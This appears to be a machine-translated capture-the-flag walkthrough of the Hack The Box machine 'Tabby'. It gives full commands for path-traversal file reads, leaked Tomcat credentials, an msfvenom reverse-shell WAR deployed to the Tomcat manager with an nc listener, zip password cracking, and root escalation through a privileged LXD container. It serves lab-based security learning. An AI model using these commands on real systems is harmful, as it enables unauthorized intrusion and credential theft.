Disclaimers

The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor will I be responsible for any misuse or damage

Service detection

View open port

┌──(root💀kali)-[~/htb/Tabby]
└─# nmap -p- 10.10.10.194 --open                                                   
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:22 EST
Nmap scan report for 10.10.10.194
Host is up (0.25s latency).
Not shown: 64733 closed ports, 799 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 249.82 seconds

Port details

┌──(root💀kali)-[~/htb/Tabby]
└─# nmap -sV -T4  -A -O 10.10.10.194 -p 22,80,8080                                 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:33 EST
Nmap scan report for 10.10.10.194
Host is up (0.29s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   292.67 ms 10.10.14.1
2   293.43 ms 10.10.10.194

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.08 seconds

There are two http services. 80 is apache and 8080 is tomcat

Port 80

After port 80 is opened, it is found in the NEWS column that you have navigated to http://megahosting.htb/news.php?file=statement "

Put megahosting Add HTB to the local host file

echo "10.10.10.194 megahosting.htb" >> /etc/hosts

NEWS web page display:

We apologise to all our customers for the previous data breach.
We have changed the site to remove this tool, and have invested heavily in more secure servers

There has been an information leak, oh?

Notice that the file parameter in the url appears to be a file name. Enter http://megahosting.htb/news.php?file=../../../../../etc/passwd

The target / etc/passwd content is echoed successfully to prove the existence of LFI

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash

There is an ordinary user ash

The page will not return any files that do not exist or do not have permission.

8080 port service

On the homepage of port 8080, some information has been exposed. Maybe something can be done in combination with the LFI of port 80

It works !

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

You might consider installing the following packages, if you haven't already done so:

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml.

Path of exposed web page root directory: / var/lib/tomcat9/webapps/ROOT/

http://10.10.10.194:8080/docs/ The tomcat version displayed is Version 9.0.31

The management user profile is displayed in / etc / tomcat9 / Tomcat users XML, but cannot be displayed

The same version of tomcat is built on the machine, and the resources are here

View directory structure

┌──(root💀kali)-[/var/lib/tomcat9]
└─# ls
bin  BUILDING.txt  conf  CONTRIBUTING.md  lib  LICENSE  logs  NOTICE  README.md  RELEASE-NOTES  RUNNING.txt  temp  webapps  work

conf

┌──(root💀kali)-[/var/lib/tomcat9/conf]
└─# ls
catalina.policy  catalina.properties  context.xml  jaspic-providers.xml  jaspic-providers.xsd  logging.properties  server.xml  tomcat-users.xml  tomcat-users.xsd  web.xml

The conf folder should be at the same level as webapps, but it can't be echoed on the browser...

Check the local tomcat9. It seems that there are no files with read permission.

curl

After reading the forum tips, you should directly use apt install tomcat9 to install

View Tomcat users XML location

┌──(root💀kali)-[~/htb/Tabby]
└─# find / -name tomcat-users.xml
/etc/tomcat9/tomcat-users.xml
/usr/share/tomcat9/etc/tomcat-users.xml

/etc/tomcat9/tomcat-users. Ordinary XML users do not have read permission

┌──(root💀kali)-[~/htb/Tabby]
└─# ls -alh /etc/tomcat9/tomcat-users.xml           
-rw-r----- 1 root tomcat 2.7K 11 October 3:15 /etc/tomcat9/tomcat-users.xml

But / usr / share / tomcat9 / etc / Tomcat users XML is readable by ordinary users

┌──(root💀kali)-[~/htb/Tabby]
└─# ls -alh /usr/share/tomcat9/etc/tomcat-users.xml 
-rw-r--r-- 1 root root 2.7K 11 October 3:15 /usr/share/tomcat9/etc/tomcat-users.xml

Use pa ylaodhttp://10.10.10.194/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat -users. XML is opened with a web page. You need to open the web page source code to display the configuration

But curl can echo immediately

curl -X GET -H 'Content-type:text/xml' http://10.10.10.194/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml

tomcat-users.xml configuration information

<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="admin-gui"/>
   <role rolename="manager-script"/>
   <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>

Get a background account of tomcat: tomcat:cureP4s5w0rd123!

However, this permission is only admin GUI and manager script, not manager GUI, so we can't open the manger page and use exp

However, it was later found that using curl can access the manager's background files

┌──(root💀kali)-[~/htb/Tabby]
└─# curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:2:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs

reference resources hacktricks Method in

Compile rebound shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4242 -f war -o revshell.war

Upload rebound shell

┌──(root💀kali)-[~/htb/Tabby]
└─# curl --upload-file revshell.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/revshell"
OK - Deployed application at context path [/revshell]

Browser open: http://10.10.10.194:8080/revshell/

Get the rebound shell

┌──(root💀kali)-[~/htb/Tabby]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.194] 50070
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)

user

Find an encrypted zip file 16162020 in / var/www/html/files_ backup. zip

After downloading it locally, use zip2john to convert it to a format that John can recognize

┌──(root💀kali)-[~/htb/Tabby]
└─# /usr/sbin/zip2john 16162020_backup.zip >zip.hash   
16162020_backup.zip/var/www/html/assets/ is not encrypted!
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: 2b chk, TS_chk, cmplen=338, decmplen=766, crc=282B6DE2
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6
ver 1.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: 2b chk, TS_chk, cmplen=2906, decmplen=2894, crc=2F9F45F
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: 2b chk, TS_chk, cmplen=114, decmplen=123, crc=5C67F19E
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: 2b chk, TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

Crack to get a password

┌──(root💀kali)-[~/htb/Tabby]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it         (16162020_backup.zip)
1g 0:00:00:01 DONE (2021-12-31 03:15) 0.7246g/s 7509Kp/s 7509Kc/s 7509KC/s adnc153..adenabuck
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Decrypt zip

┌──(root💀kali)-[~/htb/Tabby]
└─# unzip 16162020_backup.zip
Archive:  16162020_backup.zip
[16162020_backup.zip] var/www/html/favicon.ico password: 
  inflating: var/www/html/favicon.ico  
   creating: var/www/html/files/
  inflating: var/www/html/index.php  
 extracting: var/www/html/logo.png   
  inflating: var/www/html/news.php   
  inflating: var/www/html/Readme.txt

However, I didn't find any useful files and tried to log in to the ash account with the cracked password

tomcat@tabby:~$ su ash
su ash
Password: admin@it

ash@tabby:/opt/tomcat$ id 
id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
ash@tabby:/opt/tomcat$ whoami
whoami
ash

succeed.

root

Check the group user information and find that the ash account is in the lxd user group

ash@tabby:/var/lib/tomcat9$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

according to hacktricks Right raising method in Method 2

kali end:
Download warehouse to local

git clone https://github.com/saghul/lxd-alpine-builder

compile:

cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

The attacker starts an http service with python and transmits the compiled image file to the target

wget http://10.10.16.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz

Load the target at the target end and initialize. Note: this operation cannot be performed in / tmp directory, but only in / home/ash /

ash@tabby:~$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
<e-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
ash@tabby:~$ lxd init

All the way by default.

Raise authority to root

ash@tabby:~$ lxc init myimage mycontainer -c security.privileged=true
lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
ash@tabby:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
ash@tabby:~$ lxc start mycontainer
lxc start mycontainer
ash@tabby:~$ lxc exec mycontainer /bin/sh
lxc exec mycontainer /bin/sh
~ # ^[[50;5Rid
id
uid=0(root) gid=0(root)
~ # ^[[50;5Rwhoami
whoami
root

Find root txt

~ # ^[[50;5Rfind / -name root.txt
find / -name root.txt
/mnt/root/root/root.txt

summary

Footold is the most difficult part. If you don't understand the configuration of tomcat, you can't get the initial shell without curl detection. hacktricks are really our good friends! When you have no ideas, you must always look at it.
user is simple.
When the authorization is raised to root, an error is always reported in the / tmp directory at the beginning, saying that the path of the image file cannot be found. Later, I thought these paths in docker might be strange
The attempt to load from the home directory of lxd administrator ash was successful.